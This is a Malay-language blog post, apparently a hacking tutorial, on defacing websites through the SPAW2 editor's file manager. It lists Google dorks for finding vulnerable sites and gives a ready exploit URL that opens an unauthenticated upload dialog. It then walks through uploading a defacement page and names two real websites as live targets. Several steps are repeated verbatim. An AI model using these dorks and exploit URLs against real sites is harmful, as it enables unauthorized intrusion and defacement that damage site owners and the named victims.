1. Macam biasa cari web vuln guna salah satu dork dibawah :
- inurl:Spaw2/dialogs/
- Inurl:spaw2/uploads/files \
- Index of:/Spaw2/uploads/files
note : ubahsuai dork untuk mendapatkan hasil yg mantap. ;)
Korang akan dapat result seperti ni :
"Index of/ spaw2/dialogs/"
"Index of/ spaw2/dialogs/"
atau
www.site.com/abc/spaw2/uploads/files/abc/abc.pdf
Bukak salah satu website.
2. Selepas itu,masukkan link exploit dibawah dan tekan enter :
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Bukak salah satu website.
2. Selepas itu,masukkan link exploit dibawah dan tekan enter :
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Masukkan di hujung url website.ia akan jadi macam ni :
www.target.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
www.target.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
3. Seterusnya akan keluar seperti dibawah :
- Click dekat anak panah menurun untuk tukar directory(rujuk gambar).
- Kemudian tekan Choose File untuk pilih file anda.
- Selepas itu tekan Upload untuk upload deface anda.
note : selalunya korang boleh upload file html di dalam directory Files.
4. Untuk melihat hasil,setelah berjaya upload akan tertera preview di panel sebelah kanan.
Akan tertera perkataan "Download File".Click ini dan akan terbuka satu tab baru dan akan terpapar la deface korang!!
Rujuk gambar bawah :
4. Untuk melihat hasil,setelah berjaya upload akan tertera preview di panel sebelah kanan.
Akan tertera perkataan "Download File".Click ini dan akan terbuka satu tab baru dan akan terpapar la deface korang!!
Rujuk gambar bawah :
DONE!!!
Live Target :
http://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
http://gormash.org.ua/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Aku bagi dua je...yang lain cari seniri.banyak lagi website yg vuln. ;)
Itu saja step2 nya.Harap korang faham.Selamat berjaya!Assalamualaikum.
http://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
http://gormash.org.ua/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Aku bagi dua je...yang lain cari seniri.banyak lagi website yg vuln. ;)
Itu saja step2 nya.Harap korang faham.Selamat berjaya!Assalamualaikum.
Credit: Rea_Perz
0 comments:
Post a Comment